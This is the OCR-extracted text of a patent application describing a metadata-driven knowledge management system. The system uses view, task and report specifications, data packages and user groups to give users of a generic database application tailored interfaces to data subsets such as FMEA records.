51032, 36], [51032, 52967, 37], [52967, 54829, 38], [54829, 56613, 39], [56613, 58502, 40], [58502, 60130, 41], [60130, 61787, 42], [61787, 63517, 43], [63517, 65415, 44], [65415, 66936, 45], [66936, 68443, 46], [68443, 70292, 47], [70292, 71903, 48], [71903, 72377, 49], [72377, 73055, 50], [73055, 73421, 51], [73421, 73806, 52], [73806, 74407, 53], [74407, 75153, 54], [75153, 75795, 55], [75795, 76429, 56], [76429, 76724, 57], [76724, 78853, 58], [78853, 79859, 59]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 79859, 0.02331]]}
|
olmocr_science_pdfs
|
2024-11-29
|
2024-11-29
|
3d39c91ef7584be36269e6cb277f4ed005387389
|
Methods and systems for creating a complex user interface adapting a generic database software application to individually manage subset domains in complex database
The method also comprises data package specification for the data subset domain, specifying a data package hierarchy within the data subset domain, specifying user groups for the data subset domain, specifying view specifications for the user groups. Further the view specification is associated with the task specification and the report specification after which the generic software application is released to a user.
Description
TECHNICAL FIELD
[0001] The present invention generally relates to database management, and more particularly relates to a knowledge management system (KMS) for specifying a subset of entity types, data relationships and attributes from the full data model that are visible to a user in a context defined by a specific use objective.
BACKGROUND
[0002] A database (DB) is an organized collection of data for one or more purposes, usually in digital form. The data are typically organized to model relevant aspects of reality (for example, the availability of seats on an aircraft), in a way that supports processes requiring this information (for example, finding an aircraft with seats available). This definition is very general, and is independent on the type of technology used.
[0003] The term "database" may be narrowed to specify particular aspects of the organized collection of data and may refer to the logical database, to physical database as data content in computer data storage or to many other database sub-definitions. The term database is correctly applied to the data and their supporting data structures, and not to an associated database management system DBMS. The database data collection with a DBMS is referred to herein as a database system.
[0004] A Knowledge management System ("KMS") is an application that is built on top of a DBMS and manipulates data within the structure of a DBMS. While a DBMS contains facts, A KMS adds rules and relationships to those facts to convert the facts into a model that can be used by software to automatically make further inference and decisions.
[0005] The term database system implies that the collection of data is managed to some level of quality (measured in terms of accuracy, availability, usability, and resilience) and this in turn often implies the use of a general purpose database management system (DBMS). A general purpose DBMS is typically a complex software system that meets many usage requirements, and the databases that it maintains are often large and complex. The utilization of databases is now spread to such a wide degree that virtually every technology and product relies on databases and DBMSs for its development and commercialization, or even may have such embedded in it. Well known exemplary DBMSs include Oracle, IBM DB2, Microsoft SQL Server, PostgreSQL, MySQL and SQLite. A DBMS also needs to provide effective run-time execution to properly support (e.g., in terms of performance, availability, and security) as many end-users as needed.
[0006] The design, construction, and maintenance of a complex database has historically required the skills of a specialist, whose tasks are supported by specialized computer tools provided either as part of the DBMS or as stand-alone software products. These tools include specialized database languages including data definition languages (DDL), data manipulation languages (DML), and query languages. These can be seen as special-purpose programming languages, tailored specifically to manipulate databases; sometimes they are provided as extensions of existing programming languages, with added database commands. The most widely supported database language is SQL, which has been developed for the relational data model and combines the roles of DDL, DML, and a query language.
[0007] However, the common every day user is not a skilled database programmer. Often times the user is left to his own devices to use standard one-size-fits-all query tools and data presentations. Although data presentations are known that sort results by subject relevancy, those data presentations are typically rendered as a list of documents pages long with mere summary lines attempting to describe the data contained in each. Hence, there is a need for methods to alleviate the need for special programming skills to efficiently retrieve desired data from large complex databases and to provide the most useful display of the requested information.
BRIEF SUMMARY
[0008] A computer executed method is provided for creating a complex graphical user interface on a display device via generic computer readable database software that is executable on a processor to manage only a specific data subset domain of the application data in a database. The method comprises creating metadata defining a data subset domain, the metadata including a Task Specification, a Report Specifications and a View Specification and defining Attribute metadata, Entity metadata and Relationship metadata for the data subset domain. The method further comprises specifying Data Package Specification for the data subset domain, a Data Package hierarchy within the data subset domain, a user group for the data subset domain, a View Specification for the user groups and associating the View Specification with the Task Specification and the Report Specification. The generic software application is then released to a user.
[0009] A computer program product is provided on a non-transitory storage medium comprising steps for creating a complex graphical user interface on a display device via generic computer readable database software to manage only a specific data subset domain of application data in a database. The steps comprise creating metadata defining a data subset domain, the metadata including a Task Specification, a Report Specifications and a View Specification and defining Attribute metadata, Entity metadata and Relationship metadata for the data subset domain. The method further comprises specifying Data Package Specification for the data subset domain, a Data Package hierarchy within the data subset domain, a user group for the data subset domain, a View Specification for the user groups and associating the View Specification with the Task Specification and the Report Specification. The generic software application is then released to a user.
Specification with the Task Specification and the Report Specification. The generic software application is then released to a user.
[0010] Furthermore, other desirable features and characteristics of the [system/method] will become apparent from the subsequent detailed description and the appended claims, taken in conjunction with the accompanying drawings and the preceding background.
BRIEF DESCRIPTION OF THE DRAWINGS
[0011] The present invention will hereinafter be described in conjunction with the following drawing figures, wherein like numerals denote like elements, and wherein:
FIG. 1 is a simplified block diagram of a database system;
FIG. 2 is a conceptual organizational chart of the various schema implementing the complex user interface;
FIG. 3 is a conceptual process chart for converting raw application data into user specific Data Packages;
FIG. 4 is a flow chart of an exemplary method to create the complex user interface;
FIG. 5 is an exemplary conceptual rendition of a Data Package;
FIG. 6 is an exemplary graphical User Interface (GUI) that may be used to create a VIEWSpec;
FIG. 7 is an exemplary logic flow diagram of a method of using a VIEWSpec; and
FIG. 8 is an exemplary display generated by a VIEWSpec.
DETAILED DESCRIPTION
[0012] The following detailed description is merely exemplary in nature and is not intended to limit the invention or the application and uses of the invention. As used herein, the word "exemplary" means "serving as an example, instance, or illustration." Thus, any embodiment described herein as "exemplary" is not necessarily to be construed as preferred or advantageous over other embodiments. All of the embodiments described herein are exemplary embodiments provided to enable persons skilled in the art to make or use the invention and not to limit the scope of the invention which is defined by the claims. Furthermore, there is no intention to be bound by any expressed or implied theory presented in the preceding technical field, background, brief summary, or the following detailed description.
[0013] Those of skill in the art will appreciate that the various illustrative logical blocks, modules, and algorithm steps described in connection with the embodiments disclosed herein may be implemented as electronic hardware, firmware or computer software executing on a computing device, or combinations thereof. Some of the embodiments and implementations are described above in terms of functional and/or logical block components (or modules) and various processing steps. However, it should be appreciated that such block components (or modules) may be realized by any number of hardware, executable software, and/or firmware components configured to perform the specified functions. To clearly illustrate this interchangeability of hardware and software, various illustrative components, blocks, modules, circuits, and steps have been described above generally in terms of their functionality. Whether such functionality is implemented as hardware or software depends upon the particular application and design constraints imposed on the overall system. Skilled artisans may implement the described functionality in varying ways for each particular application, but such implementation decisions should not be interpreted as causing a departure from the scope of the present invention. For example, an embodiment of a system or a component may employ various integrated circuit components, e.g., memory elements, digital signal processing elements, logic elements, look-up tables, or the like, which may carry out a variety of functions under the control of one or more microprocessors or other control devices. In addition, those skilled in the art will appreciate that embodiments described herein are merely exemplary implementations.
[0014] The various illustrative logical blocks, modules, and circuits described in connection with the embodiments disclosed herein may be implemented or performed with a general purpose processor, a digital signal processor (DSP), an application specific integrated circuit (ASIC), a field programmable gate array (FPGA) or other programmable logic device, discrete gate or transistor logic, discrete hardware components, or any combination thereof designed to perform the functions described herein. A general-purpose processor may be a microprocessor, but in the alternative, the processor may be any conventional processor, controller, microcontroller, or state machine. A processor may also be implemented as a combination of computing devices, e.g., a combination of a DSP and a microprocessor, a plurality of microprocessors, one or more microprocessors in conjunction with a DSP core, or any other such configuration.
[0015] The steps of a method or algorithm described in connection with the embodiments disclosed herein are embodied directly in hardware, firmware, in a software module executed by a processor, or in a combination of thereof. A software module may reside in RAM memory, flash memory, ROM memory, EPROM memory, EEPROM memory, registers, hard disk, a removable disk, a CD-ROM, or any other form of storage medium known...
in the art including a processor. An exemplary storage medium is coupled to the processor such the processor can read information from, and write information to, the storage medium. In the alternative, the storage medium may be integral to the processor. The processor and the storage medium may reside in a user terminal. In the alternative, the processor and the storage medium may reside as discrete components in a user terminal.
[0016] In this document, relational terms such as first and second, and the like may be used solely to distinguish one entity or action from another entity or action without necessarily requiring or implying any actual such relationship or order between such entities or actions. Numerical ordinals such as "first," "second," "third," etc. simply denote different singles of a plurality and do not imply any order or sequence unless specifically defined by the claim language. The sequence of the text in any of the claims does not imply that process steps must be performed in a temporal or logical order according to such sequence unless it is specifically defined by the language of the claim. The process steps may be interchanged in any order without departing from the scope of the invention as long as such an interchange does not contradict the claim language and is not logically nonsensical.
[0017] Furthermore, depending on the context, words such as "connect" or "coupled to" used in describing a relationship between different elements do not imply that a direct physical connection must be made between these elements. For example, two elements may be connected to each other physically, electronically, logically, or in any other manner and through one or more additional elements or components.
[0018] While at least one exemplary embodiment will be presented in the following detailed description of the invention, it should be appreciated that a vast number of variations exist. It should also be appreciated that the exemplary embodiment or exemplary embodiments are only examples, and are not intended to limit the scope, applicability, or configuration of the invention in any way. Rather, the foregoing detailed description will provide those skilled in the art with a convenient road map for implementing an exemplary embodiment of the invention. It being understood that various changes may be made in the function and arrangement of elements described in an exemplary embodiment without departing from the scope of the invention as set forth in the appended claims.
[0019] The subject matter provided herein discloses a KMS featuring a mechanism through which a generic software application (the "Application") for managing complex knowledge bases can be adapted to address specific, narrow data domain access at much lower cost than other existing approaches. This mechanism is accomplished through the use of a generic set of declarative data structures (i.e., Metadata) and associated generic software along with a limited domain specific set of database tables to automatically produce HTML pages and associated scripts to allow users to navigate through a domain specific data set and to modify its content. The Metadata and generic software provide a mechanism to model a subset of a database that is visible to each user as they perform specific tasks to build the knowledge base and the specific steps for each task.
[0020] The specification(s) of the structures for entities, attributes and relationships for a data Model constitute the Metadata for that Model. A Model is a large group of data elements and data structure specifications that supports automatic data inference and decision making. The Model contains Entity Metadata, Attribute Metadata, and Relationship Metadata.
[0021] Relationship Metadata is the collection of relationship specifications that have been defined for the system. A relationship captures how entities are related to one another. Relationships can be thought of as verbs, linking two or more nouns. Examples: An aircraft has engine relationship links aircraft and the engine. Aircraft has failure modes relationship links aircraft and all the related failure modes. A failure mode has symptoms relationship links a failure mode to symptoms. A recursive relationship is one in which the same entity participates more than once in the relationship.
[0022] Entity Metadata is the collection of Entity Specs that have been defined for the system. An entity-type is a category. An entity, strictly speaking, is an instance of a given entity-type. There are usually many instances of entity-types. Because the term entity-type is somewhat cumbersome, most people tend to use the term entity as a synonym for this term. Entity Types can be thought of as common nouns and entities can be thought of as proper nouns. Examples: a computer, aircraft, navy ship, automobile, tank, engine, an employee, a song, a mathematical theorem. Entity Metadata is the collection of Entity Specs that have been defined for the system.
[0023] Attribute Metadata defines the characteristics that Entity Metadata can have where an attribute gives the details of an attribute for a given entity. An attribute of an entity or relationship is a particular property that describes the entity or relationship. The set of all possible values of an attribute is the attribute domain. An attribute can be thought of as adjectives describing a noun (e.g., a person can have a height). Height would be the Attribute Metadata. Tim’s height is 6 feet tall is the value of the attribute. Attribute Metadata is the collection of Attribute Specs that have been defined in the system.
[0024] Metadata specifications are recorded in the database as Entity Specifications ("Entity Specs"), Attribute Specifications ("Attribute Specs"), Relationship Specifications ("Relationship Specs"), Task Specifications ("Task Specs"), View Specifications ("View Specs"), Report Specifications ("Report Specs") and other items that collectively define the functionality and behaviors of the Application.
[0025] Metadata is one of the two elements, along with Administrative Data, that constitute the Control Data for the Application. Since the entire DBMS is controlled by...
this metadata, it includes much more detail than metadata encoded by a typical database application. The Metadata in a data model (a "Model") will have sufficient detail to produce the database schema for that Model along with additional specifications for workflow, access controls, and user help and support data for database editors. It is helpful to think of Metadata as a set of questions that the Model will eventually answer. It does not encode the answers to any of those questions but is used by the system to help the users to answer the questions.
[0026] Administrative data is data that is used to control access to the DMBS data, display data and to control work assignments within the DMBS. Examples of Administrative Data include Users, User Groups and Data Packages. This data will typically be initialized by the development team and then managed by one or more users from customer team.
[0027] A user group is a collection of users for which a common set of access control can be defined. In this context access controls pertain to the subset of data that they can view, the subset of data that they can modify and the subset functions that they can execute.
[0028] The data in the Model that controls the subset of the database that is visible to each user as they perform specific tasks is called a ViewSpec. The data in the Model that controls the specific steps for each task is called a TaskSpec.
[0029] In order to develop a set of ViewSpecs and TaskSpecs that are appropriate for each domain, the domain is first decomposed into a set of sub-models that reflect substantially self-contained elements of the overall model. For example, in a domain for a medical information system, typical sub-models would focus on "principles of chemistry", "principles of biology", "human physiology", "the respiratory system", "the digestive system", etc. Sub-models may also contain lower level sub-models. For example, the model for each of the systems of the body (e.g. respiratory, digestive, immune, etc.) may contain sub-models that describe, "normal functions", "organs", "interactions", "diseases", "treatment" and "prevention." It should be recognized that there will typically be many sub-models within a domain that are structurally equivalent. For example, all of the sub-Models for "diseases" (one for each body system) captures the data that is structurally equivalent. This would be so because the models all contain descriptions of changes to the composition of the organs, tissues or processes that result in loss of function and the symptoms associated with these changes.
[0030] The subject matter herein uses a data structure called a "Data Package" to represent the sub-models and a data structure called a "Data Package Specification" 94 to represent the common structures that are used by one or more Data Packages.
[0031] Data Packages are also referred to as "Concepts" which is nomenclature that is probably closer to their function description. A Data Package/Concept is used to define a subset of the database data that would be maintained by a single group or updated in a single task. For example an automobile may contain as many as 50 systems for which the structure of the Model (e.g. the set of entities, attributes and relationships to be specified) is equivalent but the Application Data for each system will be substantially different. In this example, each of the 50 systems would be a separate Data Package for which a separate group of users would be responsible for importing, editing and maintaining the Application Data for one or more of the systems. The specification of the Data Package Hierarchy 100 (See, FIG. 3) for a Model is a critical aspect of developing a new application and will usually reflect application-specific structures that correspond to the assembly of the monitored asset(s) and the organization of the producer of the asset and/or the maintainer of the asset. A Data Package Hierarchy 100 is the relationship organization between data packages that allows data access controls to be shared. This hierarchy 100 is organized as a tree where the tree nodes that contain additional subordinate nodes share their access control permissions with all of their subordinate nodes. For example, if a user 99 has access to one data package, they automatically have equivalent access to all data packages subordinate to that one data package.
[0032] Application Data is the specific set of instances for the entities, the values for their attributes and their interrelationships constitutes the Application Data for a Model. Non-limiting examples of Application Data in a maintenance environment are the specific set of functions performed by an asset, the set of failure modes for that asset, the occurrence rates of those failure modes and the set of relationships between failure modes, functions, symptoms and corrective actions. Application data may be thought of as the full set of answers to the questions asked by the Metadata of the Model.
[0033] Application Data for a Model is separated between Production Data and Change Package Data. All editing of Application Data occurs against constructs called "Change Packages." A Change Package includes a block of updates to the content of the Model which will be applied to the production Model as a single transaction which is called "release to production." Production Data is the result of "Change Package Data" for which the editing and auditing process is complete, has been reviewed for consistency and has been "Released" into the production data set.
[0034] In the definition of the Data Packages for an application, a database developer will encounter many sets of Data Packages that are structurally similar. An example would be that all of the sub-Models for "diseases" (one for each body system) captures the data that is structurally equivalent (e.g., they all contain descriptions of changes to the composition of the organs, tissues or processes that result in loss of function and the symptoms associated with these changes.) The data item for each set of Data Packages that share a common structure is called a Data Package Type.
Each Data Package Type is associated with one or more Viewspecs that reflect the user activities associated with creation, import, audit and finalization of the data for portions of the Model within the domain. These Viewspecs are used by the user interface to present the limited portion of the Model that is relevant to the user in performing a specific task in the overall knowledge base development process.
One or more Task Specifications ("TaskSpecs") are associated with each "ViewSpec" to control the sequence of steps that is required for the user in performing a specific task in manipulating the data in the database. A Task Spec is the portion of the Metadata of a Work Package Specification that controls the sequence of steps that must be performed to provide the Application Data for each Work Package that is governed by the Work Package Specification.
A Work Package Specification is a portion of the Metadata that specifies the structure and control data that will be used to create one or more Work Packages. For example, a Work Package Specification would be created to specify the structure and control data for the Work Packages that facilitates the Modeling for each of the 50 systems discussed earlier. It is important to recognize that the purpose of a Work Package Specification is to allow application designers and administrators to create templates for the creation of Work Packages by end-users who know what they want to do, but need help in the required sequence of steps to accomplish that objective. It is also important to know that part of a Work Package Specification is the specification of behaviors that are to be performed when a new Work Package instance governed by this Work Package Specification is created or released to production.
The combination of Data Packages, Data Package Specification 94, Task Specifications 13 ("TaskSpecs") and View Specifications 11 ("ViewSpecs") (See, FIG. 2) are used by the generic software to create the set of graphical user interface 80 ("GUI") screens that are presented to the user based on the set of tasks for which the user is responsible. This set of GUIs provides a complete set of interfaces needed by all users to create and modify their portion of the knowledge database (See, e.g., FIG. 6).
FIG. 1 is a block diagram of a simplified computer system commonly used to store and use a content data database 10 containing application data and a DBMS 20. The database 10 may reside in any suitable storage media known in the art or that may be developed in the future. Non-limiting examples of computing devices may be desktop computers, laptop computers, cell phones, projectors and handheld personal computing devices of all types.
A database user may access the database 10 by utilizing a plurality of graphical user interfaces 80 that are displayed on a display device 90. The display device may be any display device known in the art or that may be developed in the future. Non-limiting examples of a display device may be a cathode ray tube display, a plasma display, an LCD display, and a hologram.
FIG. 2 is a chart laying out an overview of the data schema arrangements for generating View Specifications by the KMS. FIG. 3 is an overview of the KMS that may access the database 10 using a set of tools that are user friendly and that allow the conversion of unstructured and disparate data sources into an integrated data set that supports data driven inferences desired by an end user.
A specific user 99, as shown at the bottom left, has read access (shown as shaded box) and write access (as shown as white box) to a small portion of the database 10 at a given time. These portions of the database 10 are known as Data Packages 150, which are systems, sub-systems and elements which are related to each other by topic in a hierarchical manner. The portion of the database 10 for which user 99 has access is specified by a set of groups to which the User belongs and by a currently active work package. It is important to recognize that the portion of the database accessible to the user based on the work package limitations may be much smaller than the portion of the database accessible to the User 99 based on their Group association.
A "group" or "user group" is administrative data that identifies users 99 associated with one or more "Data Packages" 150 for which they will have read and or right access to the data in the database 10 that is associated with those "Data Packages" (See, FIG. 5 for an exemplary conceptual rendition of a Data Package). For example, an administrator may create a user group called "System-1 Developers" and specify that this group has "Write Access" to content data in the "System-1" Data Package. The user group data may be used by the KMS for access control and workflow control for a Data Package (See, FIG. 5 for an exemplary rendition of a Data Package).
"Content data" is stored in physical data tables in database 10. A table name is the name assigned to a physical table. It is how a DBMS or application accesses the content of the physical table.
Content data encodes entities, values for entity attributes, and relationships that are stored in data structures that support internal DBMS functionality rather than in structures that encode data terminology that is familiar to the end users. For this reason, much of the functionality within the KMS 25 is focused on converting the content data in its physical form that facilitates DBMS functionality into a form that is manageable in size and is under-
standable by the end-users authorized for read and write access. This is done by tailoring the content data to the confines of a specific work package. Non-limiting examples of content in the context of electro-mechanical asset maintenance would be the specific set of functions performed by an asset, the set of failure modes for that asset, the occurrence rates of those failure modes and the set of relationships between failure modes, functions, symptoms and corrective actions. One may consider content data as the full set of data to answer the questions asked by the metadata 14 of the content data in the database 10.
Much of the functionality of the KMS 25 relies upon the careful factoring of the content data in the database 10 into a number of "type specifications" that are related to each other through inheritance from other type specifications and the composition of those other type specifications. Using a hypothetical database application for American History for example, George Washington's military career could be factored into the French and Indian war period and the Revolutionary War period, further factored into different engagements that occurred during those periods and yet further factored into other sub-type specifications related to those engagements.
A significant difference between the instant subject matter and a traditional database application is that in regard to the current subject matter, a large percentage of the type hierarchy (i.e., data relationships/factoring) is not known at design time. Instead, this portion of the type hierarchy is created by end users as they record/input the content data into database 10. It should be emphasized that the type specifications for the system metadata 14 are developed by a system designer, while type specifications for the content data in database 10 itself are developed by a user 99 that may have no database development skills.
Referring again to FIG. 2, a "work package" 92 is administrative data, which comprises a "specialized change package." A "specialized change package" facilitates the development of specific portion of the database content. A work package 92 is associated with a specific Data Package 150, view spec 11, a report spec 18, and task spec 13. For example, a work package 92 may be created to enter and audit data from a failure mode and failure effects analysis as a part of the database 10 content development for a particular complex system. It is useful to think of a work package 92 as a container of data and an associated wizard that assists the user in populating the appropriate data for the container.
A "work package specification" 201 is a portion of the metadata 14 that specifies the structure and control data that will be used to create a work packages 92. For example, a work package specification 201 may be created to specify the structure and control data for the work package 92 that facilitates the modeling of a subsystem of an electro-mechanical system. The purpose of a work package specification 201 is to allow application designers and administrators to create templates for the creation of work packages 92 by users 99 who know what they want to accomplish with their data, but need help in the required sequence of steps to accomplish that objective. Part of a work package specification 201 is the specification of behaviors that are to be performed when a new work package 92 instance governed by its work package specification 201 is created.
Work packages 92 may be sequenced together. Since a Work Package Specification 201 specifies behaviors that are to be performed when a new Work Package instance governed by that Work Package Specification is created, the specified behaviors can be to create new, derived Work Packages. A sequence of Work Packages arising from an initial event may be considered as a network of work packages. An example of a task network is a sequence of Work Packages that arise from the receipt of a bill of lading.
A "change package" includes a block of data updates to the content of the database that will be applied to the database as a single transaction which is called a "Release To Production". "Change package data" is data for which an editing and auditing process is complete, has been reviewed for consistency and has been released to production.
The database 10 also includes metadata 14 which is data about the data in the database. Metadata 14 comprises structure specifications entities, attributes and relationships associated with the data. Metadata specifications are recorded in the database as "entity specs" 15, "attribute specs" 16, "relationship specs" 17, "task specs" 13, "view specs" 11, "schema specs" 12, "report specs" 18 and other items that collectively define the functionality and behaviors of the KMS 25. Since the entire KMS 25 is controlled by the metadata specifications 14 include much more detail than metadata encoded by a typical database application. The metadata specifications 14 in KMS 25 has sufficient detail to produce the database schema along with additional specifications for workflow, access controls, user help and support data for DBMS editors such as a cross tab editor 45. It is helpful to think of a metadata specification as a set of questions that the database 10 will eventually answer. The metadata specifications 14 do not encode the answers to any of those questions but is used by the KMS 25 to help the users 99 to answer the questions.
An "entity" is a specific physical data table structure grouping a set of data elements that have a repeatable set of properties. Non-limiting examples of entities for a maintenance database may include functions, failure modes, symptoms and repairs.
An entity specification (or "entity spec") is a definition of a given entity. An entity spec lists the attributes and relationships that apply to the entity along with other properties of the entity spec. Non-limiting examples of data in an entity spec include Long Name, Description, primary key, and for maintenance related KMS systems, "Failure Mode Affects Function." A primary key is a unique identifier in an entity spec that identifies a unique entity. The primary key is utilized to create "relationships"
An "attribute" is the subset of the properties for each entity whose values are basic data types such as text, numbers or binary objects. Non-limiting examples of attributes in a maintenance database may include the names of the entities, the failure rate of the failure modes and the instructional text for the corrective actions.
An "attribute specification (or "attribute spec") is the definition of a given attribute. An attribute spec lists the properties for an attribute. Non-limiting examples include an attribute type and a size of the attribute in bits. A human readable version of the attribute specification is a "display name." The display name includes spaces and punctuation where applicable. An "attribute type" is a data type, such as a number, string, references, Boolean logic, etc. An attribute constraint is a data field constraint. Non-limiting examples include a mandatory constraint, a minimum value, a max value, etc.
Attributes are changed using a specific attribute editor, of which there are several types. Attribute editors may include pick list, multi select list, text (no formatting), long text (with formatting) and a reference item selector.
A "relationship" is a subset of properties for each entity whose values are pointers to other entities. Non-limiting examples of relationships that may be used in a maintenance database include set of symptoms produced by each failure mode and the corrective action for each failure mode. Most relationships may be edited. In some cases, many-to-one relationships are presented to the user along with attributes in the editor from the "many" side since the relationship can only contain a single value from this side.
A "relationship specification" (or "relationship spec") is the definition of a given "relationship". A relationship spec lists the properties for the relationship along with its associations to entity specifications, defined above. Optionally, relationship specs themselves can also have attributes which are specific to the relationship connecting two entities. Non-limiting properties include parent entity specifications, child entity specifications and attribute specifications.
The forward name is the name of the "relationship" displayed to a user when editing the relationship from the source entity to the destination entity. The "forward name" is similar to the name of the "relationship spec," except that it has spaces and other content for human readability. For example the relationship name FailureModeCausesSymptom would be changed to read "Failure Mode Causes Symptom" by a human.
The reverse name is the name of the relationship displayed to the user 99 when editing the relationship from the destination entity to the source entity. For example the relationship name FailureModeCausesSymptom would be changed to read "Symptom caused by Failure Mode" by a human.
The Schema Specifications 12 ("Schema Specs") and View Specifications 11 are used by the KMS 25 to convert the data (as stored in relational database tables) into a logical view of a Data Package Hierarchy 100 which shows entities and relationships using terminology and structures that are familiar to the end user rather than the structure encoded within the KMS 25.
A "schema specification" (or "Schema Spec") defines a set of logical entities within the data model. While an entity spec (defined above) defines a specific physical table structure, a schema spec defines a logical compartmentalization of data from that table. The schema spec allows the KMS 25 to display items representing those logical entities separately. The logical entities will contain a subset of the "attributes" and "relationships" that are valid for an entity spec.
A "view specification or "view spec" is user definable metadata 14 that specifies the subset of Application or Content Data that is viewable to user from the perspective of a Data Package, Work Package or report that allows a user 99 to select attributes and data definitions, assign them to user defined hierarchical levels and then link the data definitions such that the a second data definition operates as a sub-query for a first data definition.
A Viewspec can be used by many different Data Package Specifications 94, Work Package specifications 201 and Report specifications 18. An example of a Viewspec is the set of entities, attributes and relationships that can be used to navigate through the application data 10' concerning a system and edit its contents.
Exemplary application data in database 10 may be Failure Mode and Effects Analysis (FMEA) data for a particular system. The complete data for the FMEA can be viewed using one or more Viewspecs. Entities may be System, LRU, Failure Mode, Symptom, and Function. The attributes may be system name, LRU name, failure mode name, failure mode rate, symptom name, symptom false alarm rate, function name and function criticality. The relationships may be "System Contains LRUs," "LRU contains Failure Modes," "Failure Mode causes Symptom," and "Failure Mode effects function."
A Data Package Specification 94 is a definition of a type of a data package that grants the access controls for that type. The Data Package Specification 94 allows multiple different data packages to be defined with the same set of controls easily. A specific example of a Data Package Specification 94 could be the specific FMEA data for each system on a vehicle (i.e., Fuel Management, Power generation, Propulsion, Steering, Braking, etc.). Each Data Package includes additional data to specify the set of users that can modify the data in that particular data package. The Data Package Specification 94 specifies the data structure to contain the data for a specific FMEA ad to map it the physical data structures in the data 10'.
A Report Specification comprises metadata that defines the layout of the data from the specific data subset domain 151 as rendered to the display device or onto paper. A single viewspec can have multiple report specifications that give different layouts for rendering the view-
spec content to the user.
[0069] An Example of a Work Package would be the task assigned to a specific user to create the FMEA data for a single system. The Work Package specification 201 would include the Viewspec and a Write Data Package List that would be assigned to a user 99 to create the FMEA data for any system.
[0070] In other words, a view spec 11 specifies a subset of content data of data base 10 that is viewable to particular user that is associated with a Data Package, Work Package or report. A view spec 11 also performs terminology mappings (aka "Aliases") that convert DBMS standard terms to terms that are familiar to a given user 99. For example, the term "module" may be mapped to the term "LRU" for one user and "ECU" to another user. The mapping is accomplished using generic editors. A non-limiting list of generic editors includes grid editors, entity editors, crosstab editors, relationship editors and graphical Modeling tools.
[0071] A data definition may be described as a query with filters that combines one or more entities and selected attributes and may be identified with a specific name, such as "symptoms" or "symptom causes failure modes."
[0072] A "task specification" or "task spec" is that portion of the metadata 14 associated with a Work package specification 201 that controls the sequence of steps that must be performed to locate and provide the content data for each work package 92 that is governed by the work package specification.
[0073] FIG. 4 describes an exemplary sequence of steps 200 to implement the inventive concepts described herein. At process 210 the Metadata 14 for the domain of data 10' of concern is identified. When the one or more Viewspecs are provided for an existing data source 10', the basic metadata 14 for the domain is created or obtained. This metadata 14 comprises the definitions of all entity types 15, attribute types for the data that is to be displayed, relationship types and primary keys. Metadata 14 may be created using any suitable commercial tool for creating Entity Relationship Models for a relational database.
[0074] Once the Metadata 14 had been identified, it needs to be loaded into table structures that are used by the system at process 220. This can be an automated import or a manual entry using editors. Such tables that are characteristic of the subject matter described herein are the Entity Specification, which comprises the Table Name 95, the Primary Key, and the Long Name; the Relationship Specification, which comprises the Source Entity Type 15, Destination Entity Type 15, Forward Name, Reverse Name and Cardinality Rules; and the Attribute Specification, which comprises the Entity Name, the Attribute Name, the Display Name, the Attribute Type, the Attribute Editor and Constraints.
[0075] The next step is to partition the application data into Data Package Types at process 230 that are associated with recurring patterns of import, audit and authoring in the application data. For example, a FMEA application would have a Data Package Type to contain a Bill of Materials (BOM) for a vehicle and another Data Package Type to contain the Failure Modes and Effects for each assembly identified in the BOM.
[0076] The Application data is partitioned into Data Packages 150 at process 240, where each Data Package is associated with a single Data Package Type. For example, a FMEA application would have one Data Package 150 to contain the BOM hierarchy for a vehicle and a large number of Data Packages 150 to contain each of the Failures and effects of each assembly identified in the BOM. It should be noted at this point that data base developers may iterate between processes 230 and 240 until all of the data that the knowledge base will contain is mapped to a Data Package 150 and all Data Packages 150 are associated with a single Data Package Type 201.
[0077] At process 250, User Groups 91 are associated with the read and write access to each Data Package 150. It should be pointed out for clarity that a Data Package 94 may be thought of identifying Data Packages 150 that exist at the same horizontal slice of the Data Package hierarchy 100, while User Groups 91 identify a grouping of Data Packages that exist in the same vertical slice of the Data Package hierarchy 100.
[0078] At Process 260, the ViewSpecs 11 that will be associated with each Data Package Type 94 will be specified. A database developer creates a separate Viewspec 11 for each subset of Data Package Type 94 that would be presented to the user 99 to support specific editing and auditing tasks. In developing an exemplary FMEA for an assembly, the user 99 may want to view the data from the perspective of Failure Modes and the effects that they produce. At another point in the analysis, the user 99 may want to view all of the effects and then see the Failure Modes that produce those effects. These two ways of viewing the same data are specified through two separate ViewSpecs 11 that would be associated with the Data Package.
[0079] An element of a Viewspec 11 is a Data Graph, which specifies a set of Entities and Relationships that should be included in the Viewspec. In a FMEA example, where the purpose of the data view output is to display Failure Modes and Effects, the Data Graph would contain the following exemplary relationship structure:
- **Entity Type: Assembly XYZ**
- **Relationship Level 1**: Assembly XYZ contains Assembly XYZ1
- **Relationship Level 2**: Failure Mode causes Effects
[0080] This exemplary Data Graph instructs display rendering software to expect one or more Assembly
At process 270, the Viewspecs 11 are attached to task specifications. Once the Viewspecs 11, Data Packages 150, Data Package Specifications 94 and User Groups 91 have been defined, a developer can create Task Specifications 13 that define how a specific User Group 91 will edit the data in a Data Package Type using a ViewSpec 11 to control the data that they will see while performing the task. A Task Specification 13 also identifies the specific steps associated with the overall task and the consistency checks that can be performed when the task is complete. Consistency Checks ensure that the data in the Data Package meets the quality constraints defined for the Entity Specification 15, Attribute Specification 16 and Relationship Specification 17 defined in the Data Package 150.
At process 280, the Viewspecs 11 are also attached to Report Specification ("Reportspec"). A Viewspec includes a Data Graph. A Viewspec 11 is a convenient basis for generating reports that will typically navigate the same Entity Types 15 and Relationship Specs 17 as are already being navigated by the Viewspec 11. The Viewspec 11 becomes the basis for a Report Specification 16 and then adds page layout details to the Report Spec 18.
At Process 290 the DBMS application 20, including the Viewspecs, Taskspecs and Reportspecs, are released for use by User 99 for use at Process 295. As user 99 interacts with the KMS 25, they create Work Packages 201 that are used to guide the editing of data in a Data Package 150 based on one of the Taskspecs 13 that are applicable to the Data Package Type 15 associated with the Data Package 150.
At process 295, user 99 creates reports based on the Report Specifications created and attached to the Viewspec 11 in process, that are used to document the contents of the application data in the database 10. The reports generated are based on the Viewspec 11 and one or more data entry points supplied by the user 99 when the report is requested.
In some embodiments, working on one Data Package 150 may result in the creation of new, lower level Data Packages 150. For example, a user 99 editing the data 10' for System 1 may identify that System 1 contains two subordinate Data Packages - Subsystem 1.1 and Subsystem 1.2. These subordinate Data Packages are automatically created by the TaskSpec 13 using data recorded in the "completion behaviors" elements 205 of the Taskspec.
